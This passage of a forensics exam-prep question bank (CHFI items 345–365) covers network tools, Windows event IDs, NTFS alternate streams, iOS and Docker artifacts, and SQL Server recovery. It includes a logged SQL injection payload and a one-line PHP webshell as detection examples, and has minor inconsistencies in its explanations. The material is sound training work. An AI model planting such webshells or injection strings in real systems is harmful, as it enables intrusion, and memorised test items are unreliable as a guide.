Why this answer

tcpdump (A) is a command-line packet capture and analysis tool that uses libpcap to intercept and decode live network traffic, making it a staple for network forensics. Wireshark (E) is the de facto GUI protocol analyzer that captures packets and provides deep dissection of hundreds of protocols, so it is also a core network forensics tool. By contrast, Autopsy (B) is a disk/image forensics platform for file system and artifact analysis, Volatility (C) is a memory forensics framework for RAM dumps, and dd (D) is a low-level imaging/duplication utility — none of these are primarily used to capture or analyze network traffic.

Exam trap

The CHFI exam often tests the distinction between network forensics tools (which capture/analyze packets) and host-based forensics tools (which analyze disks, memory, or files), leading candidates to mistakenly select Autopsy or Volatility as network tools.

345
MCQmedium

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

A.%APPDATA%\Mozilla\Firefox\Profiles\
B.%WINDIR%\System32\config\
C.%USERPROFILE%\Favorites\
D.%LOCALAPPDATA%\Google\Chrome\User Data\Default\History
AnswerD

%LOCALAPPDATA%\Google\Chrome\User Data\Default\History is the precise path to Chrome's SQLite database that stores browsing history. This file contains multiple key tables, including 'urls' and 'visits', which record the full URL, visit time, page title, and transition type (e.g., typed, link, or reload). Because Chrome locks the file while running, a forensic examiner should make a forensic copy via a live acquisition tool or volume shadow copy before analysis, then examine it with SQLite forensics tools to recover the user's browsing activity.

Why this answer

Chrome stores its browsing history in a SQLite database file named 'History' located under the user's local app data directory. The full path is %LOCALAPPDATA%\Google\Chrome\User Data\Default\History. This file contains tables such as 'urls' and 'visits' that record all visited URLs, timestamps, and visit counts.

Exam trap

EC-Council often tests the distinction between browser-specific storage paths, and the trap here is that candidates confuse the Chrome history location with Firefox's profile path or Internet Explorer's Favorites folder, leading them to pick Option A or C.

How to eliminate wrong answers

Option A is wrong because %APPDATA%\Mozilla\Firefox\Profiles\ is the default location for Firefox profile data, not Chrome. Option B is wrong because %WINDIR%\System32\config\ stores Windows system registry hives (e.g., SAM, SECURITY, SOFTWARE), not browser history. Option C is wrong because %USERPROFILE%\Favorites\ is the default location for Internet Explorer favorites/bookmarks, not Chrome history.

346
MCQeasy

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

A.Service installation
B.Account creation
C.Brute-force password attack
D.Successful logon by the user
AnswerC

Multiple rapid Event ID 4625 entries in the Windows Security log are a hallmark indicator of a brute-force password attack. Each 4625 represents a failed logon attempt, and when an attacker submits numerous password guesses for the same account or from the same source IP in a short time, the log reveals a high volume of these failures. Analysts can correlate timestamps, source addresses, and target usernames to distinguish this systematic guessing from legitimate but occasional mistyped passwords.

Why this answer

Event ID 4625 is a Windows Security log event that records failed logon attempts. When multiple 4625 events appear for the same user account within a few seconds, it indicates a high volume of authentication failures in a short time window, which is the classic signature of a brute-force password attack. The rapid succession of failures rules out accidental mistypes and points to an automated or manual attempt to guess the password.

Exam trap

EC-CHFI often tests the distinction between Event ID 4625 (failed logon) and Event ID 4624 (successful logon), and the trap here is that candidates may confuse the event ID numbers or misinterpret a burst of failures as a successful logon or account creation.

How to eliminate wrong answers

Option A is wrong because service installation is logged under Event ID 7045 (Service Control Manager) or 4697 (Security), not 4625, and does not generate multiple failed logon events. Option B is wrong because account creation is recorded as Event ID 4720 (Security) or 624 (Security), not 4625, and would appear as a single event, not multiple failures. Option D is wrong because a successful logon is recorded as Event ID 4624, not 4625, and would show a single success event, not a burst of failures.

347
MCQmedium

During a forensic acquisition of a suspect's SSD, the analyst notices that the drive supports TRIM. Which of the following is the most important consideration when acquiring the drive to preserve deleted data?

A.Perform a full format of the SSD before acquisition to clear any TRIM-related issues
B.Use a hardware write-blocker and acquire the drive immediately to minimize TRIM interference
C.Enable TRIM in the forensic tool to ensure the drive is optimized before imaging
D.The SSD should be powered on for several hours to allow TRIM to complete before imaging
AnswerB

Using a hardware write-blocker and acquiring the drive immediately is the only correct approach because the write-blocker physically prevents any host-initiated T commands, including TRIM, from reaching the SSD, preserving the current state. The urgency minimizes the opportunity for the SSD's internal garbage collection to run during idle time, which could erase blocks that still contain recoverable data. A forensic image captures both allocated and unallocated space, and acquiring without delay ensures maximum data retention before the controller reclaims any stale blocks.

Why this answer

SSDs with TRIM support automatically issue commands to erase deallocated blocks, making deleted data unrecoverable. Using a hardware write-blocker and acquiring the drive immediately minimizes the time the drive is powered on, reducing the chance that the operating system or the SSD's garbage collection will issue TRIM commands that permanently wipe deleted data.

Exam trap

EC-CHFI often tests the misconception that TRIM is beneficial for forensics or that formatting helps, when in fact TRIM is destructive to deleted data and must be prevented by immediate acquisition with a write-blocker.

How to eliminate wrong answers

Option A is wrong because performing a full format writes zeros or other patterns to all sectors, which would destroy any residual deleted data, making forensic recovery impossible. Option C is wrong because enabling TRIM in the forensic tool would actively instruct the SSD to erase deallocated blocks, which is the opposite of preservation — the goal is to prevent TRIM from running. Option D is wrong because powering on the SSD for several hours allows the drive's garbage collection and TRIM processes to run, which would erase deleted data blocks, making recovery impossible.

348
MCQeasy

During a forensic analysis of an NTFS volume, an investigator finds a file that appears to be hidden. Which NTFS feature allows data to be stored in a file without affecting the file's visible size in the directory listing?

A.Alternate Data Streams (ADS)
B.Volume Shadow Copy
C.USN Journal
D.Master File Table ($MFT)
AnswerA

Alternate Data Streams (ADS) are a legitimate NTFS feature that allow additional named data streams to be attached to a file, accessible via the syntax file.txt:stream. Because standard directory listings and file properties typically report only the primary unnamed stream, an investigator using conventional utilities may completely miss malicious payloads hidden in ADS. Forensic examiners must explicitly enumerate streams using specialized tools (e.g., streams.exe, lads, or forensic suites) and inspect the $MFT attribute list to identify these hidden data regions, as they are a classic anti-forensic hiding technique.

Why this answer

Alternate Data Streams (ADS) allow additional data to be attached to a file on an NTFS volume without altering the file's main data stream or its visible size in directory listings. This is possible because NTFS organizes file data into multiple streams; the default $DATA stream holds the visible content, while additional named streams can store hidden data. Tools like `dir` or Windows Explorer only report the size of the unnamed $DATA stream, making ADS an effective method for concealing data.

Exam trap

The CHFI exam often tests the misconception that the Master File Table ($MFT) is the primary location for hiding data, but the trap here is that ADS directly allows data to be stored in a file without changing its visible size, while $MFT manipulation (e.g., slack space) is a different, more complex technique.

How to eliminate wrong answers

Option B (Volume Shadow Copy) is wrong because it is a backup and recovery feature that creates point-in-time snapshots of volumes, not a mechanism for hiding data within a file without affecting its visible size. Option C (USN Journal) is wrong because it is a change journal that records modifications to files on an NTFS volume, used for tracking changes, not for storing hidden data. Option D (Master File Table ($MFT)) is wrong because it is the central directory structure that stores metadata about every file and folder, but it does not allow data to be hidden within a file without affecting its visible size; the $MFT itself can be a target for hiding data via techniques like slack space, but that is not the feature described.

349
MCQmedium

An analyst runs 'foremost -i disk.dd -o output' and recovers several JPEG files. However, some files are corrupted or incomplete. What is the most likely cause?

A.The files were fragmented across the disk, and foremost did not reassemble fragments
B.The files were stored in a journaling file system that overwrites deleted data quickly
C.The output directory had insufficient space to store the recovered files
D.The disk image contains bad sectors that could not be read
AnswerA

Foremost performs file carving by scanning for known header and footer signatures, assuming each file occupies a contiguous sequence of clusters on the raw image. If the target file is fragmented, the recovered output will consist of the first contiguous fragment up to the first footer (or the configured maximum file size), and subsequent fragments are ignored rather than reassembled. This yields truncated or corrupted files exactly matching the analyst's observation, because the tool never attempts to map logical file offsets across non-contiguous disk sectors.

Why this answer

Foremost is a file carving tool that relies on file headers and footers to recover data. It does not handle fragmentation; if a JPEG file's data blocks are non-contiguous on the disk, Foremost will only recover the first fragment up to the point where the next fragment begins, resulting in a corrupted or incomplete file. This is a known limitation of header/footer carving without fragmentation support.

Exam trap

CHFI often tests the misconception that file carving tools automatically handle fragmentation, leading candidates to overlook the fundamental limitation of header/footer carving without reassembly logic.

How to eliminate wrong answers

Option B is wrong because journaling file systems (e.g., NTFS, ext3/4) primarily protect metadata integrity and can overwrite deleted data, but Foremost carves raw data from the disk image regardless of file system structure; journaling does not inherently cause fragmentation or incomplete carving. Option C is wrong because insufficient output directory space would cause a write failure or error message, not the recovery of corrupted or incomplete files; Foremost would typically stop or warn, not produce partial files. Option D is wrong because bad sectors would cause read errors during imaging, not during carving from a completed disk image; if the image already contains unreadable sectors, those sectors would appear as zeros or errors, but Foremost would still recover complete files from readable sectors—corruption from bad sectors would be random, not specifically fragmentation-related.

350
MCQhard

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

A.The path is not typical for svchost.exe, which resides in System32
B.Run keys are only for startup programs, not services
C.The run key is disabled in Windows 10
D.The registry value name 'UpdateService' is too generic
AnswerA

Svchost.exe is a critical Windows service host process that must reside in C:\Windows\System32 (or SysWOW64 on 64-bit systems for 32-bit services). A legitimate svchost.exe never runs from a user profile directory, such as C:\Users\<username>\AppData\Roaming, because that would violate Windows binary protection and signature requirements. The unexpected path alone is a strong indicator of malware, as attackers often name rogue executables svchost.exe to blend in with legitimate processes while locating them in writable, non-standard folders.

Why this answer

The legitimate svchost.exe is a critical Windows system binary located in C:\Windows\System32. An executable named svchost.exe running from C:\Users\Public\ is a classic masquerading technique used by malware to evade detection by mimicking a trusted process name while residing in a user-writable, non-standard directory. This path deviation is the primary red flag because system processes should never execute from user profile or public folders.

Exam trap

In CHFI exams, a common trap is the misconception that any svchost.exe outside System32 is automatically malicious, but the real forensic indicator is the path anomaly. Candidates may overlook this and focus on the generic name or the fact that Run keys are for programs, not services, missing the core indicator of process masquerading.

How to eliminate wrong answers

Option B is wrong because Run keys are indeed used to launch programs at user logon, and while they are not for Windows services, malware often uses them to achieve persistence by executing a malicious binary; the fact that it's not a service does not make the entry less suspicious. Option C is wrong because Run keys are fully functional in Windows 10 and are a common persistence mechanism; they are not disabled by default. Option D is wrong because while 'UpdateService' is generic, the suspicious element is the executable path, not the name; attackers frequently use generic names to blend in, so a generic name alone is not a reliable indicator of compromise.

351
MCQhard

An analyst suspects a Windows executable is packed. They run `strings` on the file and see few readable strings, and PEiD reports 'UPX 0.89.6 - 1.02 / 1.05 - 1.24'. Which static analysis technique should the analyst use NEXT to extract the original code?

A.Use UPX with the -d flag to decompress the executable
B.Search for known YARA rules matching UPX
C.Run the executable in Cuckoo Sandbox to obtain dynamic analysis
D.Load the file into IDA Pro and attempt to disassemble directly
AnswerA

UPX is a widely used open-source packer that stores a compressed executable and a self-extracting stub. Running `upx -d file.exe` invokes UPX's decompression routine, which reconstructs the original Portable Executable (PE) sections, restores the original entry point, and simplifies subsequent static analysis. This is the intended static analysis answer because it directly reverses the packing transformation, unlike dynamic execution. If the file were packed with a different tool, `upx -d` would fail with a validation error, but the question specifically indicates UPX.

Why this answer

UPX (Ultimate Packer for Executables) is a common packer that compresses Windows executables. The PEiD output 'UPX 0.89.6 - 1.02 / 1.05 - 1.24' confirms the file is packed with UPX. Running `upx -d` (decompress) reverses the packing, restoring the original executable code for static analysis.

This is the standard next step before attempting disassembly or dynamic analysis.

Exam trap

The CHFI exam often tests the distinction between detection (YARA), dynamic analysis (sandbox), and direct disassembly (IDA) versus the correct unpacking step, trapping candidates who think any analysis tool can handle packed files without prior decompression.

How to eliminate wrong answers

Option B is wrong because searching for YARA rules matching UPX would only confirm the packer's presence, not extract the original code; it's a detection step, not a decompression technique. Option C is wrong because running the executable in Cuckoo Sandbox is dynamic analysis, which risks executing potentially malicious code and does not directly extract the original packed code for static analysis. Option D is wrong because loading a UPX-packed executable directly into IDA Pro results in disassembly of the UPX stub, not the original program code; the stub must be decompressed first.

352
MCQmedium

In Docker forensics, which of the following commands would you use to inspect the history of an image, including the commands that created each layer?

A.docker image ls
B.docker history
C.docker logs
D.docker inspect
AnswerB

The `docker history` command displays the full layer chain of an image, listing each layer's ID, creation time, size, and the corresponding build command (e.g., RUN, COPY, ENV) that produced it. This makes it the definitive tool for forensically reconstructing how an image was built, as it reveals every instruction executed during the build process, including potentially malicious commands embedded in a Dockerfile. It also shows 'missing' intermediate layers that are not physically stored on the host, providing a complete timeline of image assembly.

Why this answer

The `docker history` command displays the history of an image, showing each layer along with the command that created it. This is essential in forensic investigations to trace how an image was built, including any potentially malicious commands embedded in the layers.

Exam trap

EC-Council CHFI often tests the distinction between `docker inspect` (which shows metadata) and `docker history` (which shows layer creation commands), leading candidates to confuse the two when asked about build history.

How to eliminate wrong answers

Option A is wrong because `docker image ls` lists all images on the host, showing repository, tag, image ID, and size, but does not reveal the layer history or build commands. Option C is wrong because `docker logs` retrieves the console output from a running or stopped container, not the image layer history. Option D is wrong because `docker inspect` returns detailed metadata about an image or container in JSON format, including configuration and network settings, but does not show the sequential layer commands that built the image.

353
MCQmedium

In the context of the UK Police and Criminal Evidence Act (PACE), which of the following is a key requirement for the admissibility of digital evidence?

A.The evidence must be stored on a write-protected medium
B.The evidence must be reviewed by an independent third party
C.The evidence must be encrypted at all times
D.The evidence must be obtained lawfully and without oppression
AnswerD

The correct principle is that evidence must be lawfully obtained and free from oppression, because PACE s.76 specifically excludes confessions obtained by oppression or unreliable means, and s.78 gives the court discretion to exclude evidence if its admission would cause unfairness. For digital evidence, any breach of PACE Codes of Practice during seizure or examination can trigger exclusion. This reflects the Act's core aim of regulating police conduct while preserving fairness in the criminal process.

Why this answer

PACE requires that evidence is not obtained through oppression or in violation of legal procedures, ensuring reliability and fairness.

354
Multi-Selecthard

A security team is investigating a suspected Advanced Persistent Threat (APT) intrusion. They have identified several IoCs. Which THREE of the following are considered standard types of Indicators of Compromise?

Select 3 answers
A.Employee badge number
B.IP address of a command and control server
C.MD5 hash of a malicious executable
D.Registry key path used for persistence
E.Email subject line from a phishing campaign
AnswersB, C, D

An IP address for a command and control (C2) server is a standard network-based IoC because it identifies the remote host a compromised endpoint contacts to receive instructions or exfiltrate data. Analysts frequently cross-reference such addresses with threat intelligence feeds that map them to known malware families, botnets, or ongoing campaigns, then create firewall rules, IDS alerts, or sinkhole entries. However, a single IP may be rotated quickly or sit behind a CDN, so robust detection typically correlates it with domains, certificates, or JA3 hashes.

Why this answer

Option B is correct because the IP address of a command and control (C2) server is a classic network-based IoC that defenders use to detect beaconing or outbound connections to attacker infrastructure. Option C is correct because an MD5 hash of a malicious executable is a file-based (hash) IoC that uniquely identifies known malware samples and enables blocklisting or scanning. Option D is correct because a registry key path used for persistence is a host-based IoC, since attackers commonly abuse Run keys, Services, or similar registry locations to survive reboots.

Option A is not a standard IoC type because employee badge numbers are identity/HR data, not technical artifacts of compromise. Option E is not a standard IoC type because an email subject line is contextual phishing content, not a reliable technical indicator such as a hash, IP, domain, URL, or registry artifact.

Exam trap

EC-Council often tests the distinction between technical IoCs (like IP addresses, hashes, registry keys) and non-technical or variable indicators (like employee IDs or email subject lines), trapping candidates who confuse phishing campaign metadata with standard forensic IoCs.

355
MCQeasy

A forensic investigator needs to analyze the keychain data from an iOS device backup. Which tool is specifically designed to decrypt and display iOS keychain contents?

A.Elcomsoft Phone Breaker
B.Cellebrite UFED
C.Oxygen Forensic Detective
D.Magnet AXIOM
AnswerA

Elcomsoft Phone Breaker is purpose-built for accessing iOS keychain contents, using a combination of iTunes/ramdisk backup decryption, keybag extraction, and GPU-accelerated brute-force or dictionary attacks against the backup password. It directly targets the cryptographic constructs (e.g., the device or backup keybag classes) to recover stored passwords, certificates, and tokens from keychain databases such as keychain-2.db. This is the only tool listed whose primary workflow is keychain decryption rather than general mobile data extraction.

Why this answer

Elcomsoft Phone Breaker is specifically designed to decrypt and display iOS keychain contents from backups, including passwords, tokens, and cryptographic keys. It leverages techniques such as brute-force, dictionary attacks, and GPU acceleration to recover the backup password, then extracts and decrypts the keychain data using its own implementation of the keychain decryption process, deriving the necessary encryption keys from the recovered backup password.

Exam trap

The CHFI exam often tests the misconception that general-purpose forensic tools like Cellebrite UFED or Magnet AXIOM can decrypt iOS keychain natively, when in fact only specialized tools like Elcomsoft Phone Breaker are designed for that specific task.

How to eliminate wrong answers

Option B (Cellebrite UFED) is wrong because it is a physical extraction and analysis tool for mobile devices, not specialized in decrypting iOS keychain data; it focuses on file system and logical extractions. Option C (Oxygen Forensic Detective) is wrong because it is a comprehensive forensic platform for mobile and cloud data, but it does not have native keychain decryption capabilities; it relies on third-party tools or manual extraction. Option D (Magnet AXIOM) is wrong because it is a digital forensic platform that processes artifacts from multiple sources, but it does not include a dedicated iOS keychain decryptor; it may import keychain data but cannot decrypt it natively.

356
MCQeasy

An analyst examines the following Apache access log entry: 192.168.1.10 - - [10/Jan/2023:13:45:22 +0000] "GET /search.php?q=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0". Which attack is MOST likely indicated?

A.Path Traversal
B.SQL Injection
C.Cross-Site Scripting (XSS)
D.Remote File Inclusion
AnswerB

The URL-encoded payload `1' UNION SELECT 1,2,3--` in the query string is the defining signature: the apostrophe closes the string literal, UNION SELECT appends attacker-controlled columns, and `--` comments out the remainder. This satisfies the stem's request to identify the attack from the log entry, confirming SQL injection rather than XSS or traversal.

Why this answer

The log shows a UNION SELECT statement in the query parameter, indicating a SQL injection attempt. The URL-encoded single quote (') and comment (--) are classic SQLi payloads.

357
Multi-Selectmedium

Which TWO of the following are indicators of a webshell on a web server? (Select TWO.)

Select 2 answers
A.A file named 'cmd.php' with a modification date matching other legitimate files
B.The file contains system commands executed via GET or POST parameters
C.A recently modified file with a timestamp different from other files in the same directory
D.The server's index.html file is missing
E.The file is over 1 MB in size
AnswersB, C

A webshell's defining characteristic is the ability to execute arbitrary system commands via user-controlled input, typically through HTTP request parameters. For example, a PHP backdoor might contain code such as `<?php system($_GET['cmd']); ?>` or `<?php eval($_POST['cmd']); ?>`, which directly feeds attacker-supplied data into an OS command interpreter or a dynamic code evaluation function. This functional signature is the most direct and reliable indicator because it is the core mechanism that makes the file useful as a webshell, regardless of filename obfuscation or timestamp manipulation.

Why this answer

Webshells often have recent modification times out of sync with other files, and they typically accept command parameters in GET/POST requests. Large file size alone is not definitive, and missing index.html is unrelated.

358
Multi-Selecthard

A network forensic analyst is investigating a suspected data exfiltration incident. The analyst captures live traffic and wants to identify covert channels that might be used to transfer data out of the network. Which two of the following techniques are MOST likely to indicate a covert channel? (Choose two.)

Select 2 answers
A.ARP requests broadcast to the local subnet to resolve IP addresses to MAC addresses.
B.TCP SYN packets sent to multiple ports on a single host during a port scan.
C.ICMP echo request packets with large payloads that contain non-standard data.
D.DNS queries with unusually long subdomains containing encoded data.
E.HTTP POST requests to a known legitimate website with normal-sized payloads.
AnswersC, D

ICMP tunneling can be used to exfiltrate data by embedding it in the payload of ICMP echo requests or replies. Legitimate ICMP packets typically have small, predictable payloads (e.g., 32 bytes of data). Large or non-standard payloads containing encoded data are a hallmark of ICMP covert channels. This allows attackers to bypass firewalls that permit ICMP but do not inspect payloads deeply.

Why this answer

Covert channels often exploit protocols that are commonly allowed through firewalls, such as DNS and ICMP. Long, encoded DNS subdomains suggest DNS tunneling, while ICMP packets with large, non-standard payloads indicate ICMP tunneling. Both techniques can transfer data stealthily.

The other options describe normal traffic or reconnaissance activities that do not involve hiding data within protocol fields.

Exam trap

The trap here is focusing on common malicious activities like port scanning or suspicious HTTP traffic, while overlooking that covert channels specifically involve hiding data within allowed protocols such as DNS or ICMP.

359
MCQhard

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

A.7045
B.4648
C.4720
D.4624
AnswerA

Event ID 7045 is logged by the Service Control Manager when a new service is installed on the system. In a compromise investigation, this event is a primary indicator because attackers frequently install persistent services, such as backdoors or kernel drivers, using tools like `sc` or PowerShell. The event payload includes the service name, binary path, service type, and start mode, enabling an investigator to trace the exact executable that was added. That is why 7045 is the correct answer for identifying a newly installed service during forensic examination.

Why this answer

Event ID 7045 is logged in the System event log when a new service is installed on a Windows system. This event captures the service name, binary path, and service type, making it the primary forensic artifact for identifying a malicious DLL registered as a service under HKLM\SYSTEM\CurrentControlSet\Services.

Exam trap

EC-Council often tests the distinction between System log events (7045) and Security log events (4648, 4720, 4624), trapping candidates who confuse service installation with authentication or account management events.

How to eliminate wrong answers

Option B (4648) is wrong because Event ID 4648 is a Security log event for explicit credential usage (e.g., RunAs), not service installation. Option C (4720) is wrong because Event ID 4720 is a Security log event for user account creation, not service installation. Option D (4624) is wrong because Event ID 4624 is a Security log event for successful logon, not service installation.

360
MCQmedium

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

A..plist files
B.FSEvents
C.Unified logging (log command)
D.Console.app logs
AnswerC

Unified logging is the correct source because macOS's centralized logging system, introduced in macOS 10.12, captures all system, process, kernel, and user-level log messages through the os_log API. The `log` command (e.g., `log show`, `log collect`, `log stream`) provides forensic access to these persisted logs, including the compressed .tracev3 files in `/var/db/diagnostics`. This data, complete with precise timestamps and metadata, is exactly what an examiner needs for analyzing system events on a modern Mac.

Why this answer

Unified logging (log command) is the correct answer because macOS has consolidated all system and user-level logs into a single, high-performance unified logging system since macOS 10.12 (Sierra). This system captures kernel events, application launches, and other activities in a structured, binary format that can be queried using the 'log' command-line tool or the Console app. It is the primary and most comprehensive source for forensic analysis of system activity on modern macOS systems.

Exam trap

EC-Council often tests the misconception that Console.app is a separate logging system, when in fact it is merely a GUI front-end to the same unified logging system, and candidates may overlook the 'log' command as the primary forensic tool for accessing raw log data.

How to eliminate wrong answers

Option A is wrong because .plist files are property list files used for storing configuration settings and application preferences, not system logs that record dynamic activities like application launches or kernel events. Option B is wrong because FSEvents is a file system event notification framework that logs directory-level changes (e.g., file creation, modification, deletion) for backup and indexing purposes, not application launches or kernel events. Option D is wrong because Console.app is a graphical interface that displays logs from the unified logging system, but it is not a logging system itself; the underlying data source is still the unified log, and Console.app does not provide the raw, queryable log data that the 'log' command does.

361
MCQmedium

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

A./proc/[pid]/maps
B./proc/[pid]/status
C./proc/[pid]/environ
D./proc/[pid]/cmdline
AnswerD

/proc/[pid]/cmdline is the correct source because it exposes the process's original argv array, exactly as passed to execve, with each argument separated by a null byte. This file is typically read with a tool like 'tr' or by replacing null bytes with spaces to reconstruct the full command line, including the executable path, options, and arguments. However, note that for kernel threads or zombie processes the file may appear empty.

Why this answer

/proc/[pid]/cmdline contains the exact command-line arguments used to start the process, stored as null-separated strings. This allows an analyst to see how the binary was invoked, including any flags or parameters, which is critical for identifying malicious or suspicious behavior.

Exam trap

EC-Council often tests the distinction between /proc/[pid]/cmdline (command-line arguments) and /proc/[pid]/environ (environment variables), as candidates frequently confuse the two when asked about process startup details.

How to eliminate wrong answers

Option A is wrong because /proc/[pid]/maps shows memory-mapped regions (e.g., libraries, heap, stack) for the process, not its startup arguments. Option B is wrong because /proc/[pid]/status provides process state, UID, GID, and other metadata, but does not include command-line arguments. Option C is wrong because /proc/[pid]/environ contains the environment variables inherited by the process at startup, not the command-line invocation.

362
MCQmedium

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

A.nmap
B.iptables
C.tcpdump
D.Wireshark
AnswerB

iptables is the user-space front-end for the Linux kernel's netfilter firewall framework, and it directly manipulates packet filtering rules in the INPUT, FORWARD, and OUTPUT chains. An administrator can immediately block a brute-forcing host by adding a rule such as `iptables -A INPUT -s <offending-IP> -j DROP`, which causes all subsequent packets from that source to be discarded without reaching the authentication service. This makes iptables the correct tool for actively mitigating an active attack seen in /var/log/auth entries, and rules can be persisted with `iptables-save` and restored on boot.

Why this answer

B (iptables) is correct because it is a Linux firewall utility that can create rules to drop or reject incoming packets from a specific IP address. By adding a rule such as `iptables -A INPUT -s <IP> -j DROP`, the administrator can immediately block all further traffic from that IP, preventing additional brute-force attempts.

Exam trap

EC-Council often tests the distinction between network analysis tools (tcpdump, Wireshark, nmap) and security enforcement tools (iptables), leading candidates to confuse packet capture with packet filtering.

How to eliminate wrong answers

Option A (nmap) is wrong because it is a network scanning tool used for discovering hosts and services, not for blocking traffic. Option C (tcpdump) is wrong because it is a packet capture and analysis tool, not a firewall or access control mechanism. Option D (Wireshark) is wrong because it is a GUI-based packet analyzer used for deep inspection of network traffic, not for implementing packet filtering or blocking rules.

363
MCQhard

During an iOS forensic examination of an iCloud backup, an analyst finds that the SQLite database files for the Health app are encrypted. Which component is MOST likely responsible for encrypting this data, and what is required to decrypt it?

A.The data is encrypted with the device's hardware UID; decryption is impossible without Apple's assistance.
B.The data is encrypted using Apple's FileVault; decryption requires the user's iCloud password.
C.The data is encrypted using SQLCipher; decryption requires a 256-bit key stored in the Keychain.
D.The data is protected by iOS Data Protection using a key derived from the device passcode; decryption requires the passcode or a forensic bypass tool.
AnswerD

This is correct: iOS Health data is stored in HealthKit and protected by iOS Data Protection using a per-file key wrapped by a class key that depends on the device's UID and the user's passcode. The passcode is the critical user-supplied secret; without it, decryption typically requires a forensic bypass tool that can brute-force or otherwise recover the passcode, or leverage a trusted pairing/escrow keybag when available. Apple cannot simply decrypt the data because the passcode is not known to them.

Why this answer

IOS Health app data is protected by iOS Data Protection, which uses a class key derived from the user's device passcode. This key encrypts the SQLite database files in iCloud backups, and decryption requires either the passcode or a forensic bypass tool that can extract the key from the device's Secure Enclave.

Exam trap

EC-Council often tests the distinction between device-level encryption (hardware UID) and iCloud backup encryption (passcode-derived keys), and the trap here is confusing SQLCipher (a third-party tool) with Apple's proprietary iOS Data Protection framework.

How to eliminate wrong answers

Option A is wrong because the hardware UID is used for device-level encryption of files on the local device, not for iCloud backup encryption; iCloud backups use a different key hierarchy involving the user's iCloud account and passcode. Option B is wrong because FileVault is a macOS full-disk encryption technology, not used on iOS or for iCloud backup encryption. Option C is wrong because SQLCipher is a third-party encryption library that apps can use, but Apple's Health app uses iOS Data Protection (Apple's built-in encryption framework), not SQLCipher; the key is derived from the passcode and stored in the Secure Enclave, not in the Keychain as a 256-bit key.

364
MCQhard

You are a forensic investigator responding to an incident at a financial institution. The organization uses Microsoft SQL Server 2016 for its transaction processing system. The database is configured with full recovery model and transaction log backups are taken every 15 minutes. The incident response team has identified that an attacker gained access to the database server via compromised credentials and executed a series of malicious SQL statements, including data exfiltration and deletion of critical records. The time of the attack is estimated to be between 2:00 PM and 2:05 PM. The last full backup was taken at 12:00 AM (midnight) the same day. Transaction log backups are available for the entire day. The last transaction log backup before the attack was taken at 1:45 PM. The next transaction log backup after the attack was taken at 2:15 PM. The database is still online and being used by the business. Management wants to recover the database to a point just before the attack (2:00 PM) to minimize data loss, while preserving evidence for investigation. Which of the following actions should you take FIRST?

A.Perform a tail-log backup of the database using the NORECOVERY option to capture all transactions since the last log backup.
B.Immediately restore the full backup from midnight and all transaction log backups up to 1:45 PM to a separate server for forensic analysis.
C.Shut down the SQL Server service to prevent further changes and then restore the database from backup.
D.Restore the database to a point in time using the full backup and all transaction log backups up to 1:45 PM, then apply the 2:15 PM backup to recover lost data.
AnswerA

Performing a tail-log backup with NORECOVERY captures every transaction that was recorded in the active portion of the transaction log after the last full transaction log backup, including transactions in flight or not yet backed up. The NORECOVERY option transitions the database into the Restoring state, preserving the current transaction log as a backup file that can be used for point-in-time recovery. This is the only way to preserve the complete post-backup forensic evidence, and it must be done before any restore operation is attempted.

Why this answer

Performing a tail-log backup with NORECOVERY captures all transactions committed after the last log backup (1:45 PM) up to the current point in time, including the attack period. This preserves the database in a restoring state, preventing further changes while allowing point-in-time recovery to just before 2:00 PM. It is the mandatory first step to minimize data loss and maintain forensic integrity before any restore operations.

Exam trap

The CHFI exam often tests the misconception that you should immediately restore from the last known good backup or shut down the server, when the correct first action is always to secure the current transaction log via a tail-log backup to capture all recent changes and enable precise point-in-time recovery.

How to eliminate wrong answers

Option B is wrong because restoring backups to a separate server for forensic analysis is a valid subsequent step, but it should not be performed first; the immediate priority is to capture the tail of the transaction log from the live database to avoid losing transactions that occurred after the last log backup. Option C is wrong because shutting down the SQL Server service would abruptly terminate the database and could corrupt the transaction log, potentially losing the tail-log data needed for point-in-time recovery; a controlled tail-log backup is required instead. Option D is wrong because applying the 2:15 PM backup would include the attacker's malicious transactions and deletions, which would reintroduce the compromised data and fail to achieve recovery to just before the attack.

365
MCQmedium

A security analyst is reviewing output from a Cuckoo Sandbox analysis of a suspicious executable. The report shows that the process created a mutex named 'Global\GLOBAL_MUTEX_123' and modified the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\. Which behavioral indicator is MOST evident?

A.Command and control communication
B.Persistence mechanism
C.Anti-debugging technique
D.Privilege escalation
AnswerB

The Run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run is a well-known autorun persistence location that executes a designated binary every time the targeted user logs on. By adding a value here, malware ensures it survives reboots and is relaunched automatically, a behavior that directly maps to the MITRE ATT&CK technique T1547.001 (Registry Run Keys / Startup Folder). In a sandbox report, seeing this registry modification is strong evidence the sample is establishing persistence, making this the correct classification.

Why this answer

The modification of the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run is a classic persistence mechanism. This key is automatically processed by Windows Explorer at user logon, causing any executable listed there to run. Combined with the mutex creation (which prevents multiple instances), the behavioral indicator is clearly an attempt to establish persistence on the host.

Exam trap

EC-Council often tests the distinction between user-level persistence (HKCU Run) and system-level persistence (HKLM Run or services), and candidates may confuse the registry modification with privilege escalation or C2 activity because they see 'Run' and assume it implies higher privileges or network communication.

How to eliminate wrong answers

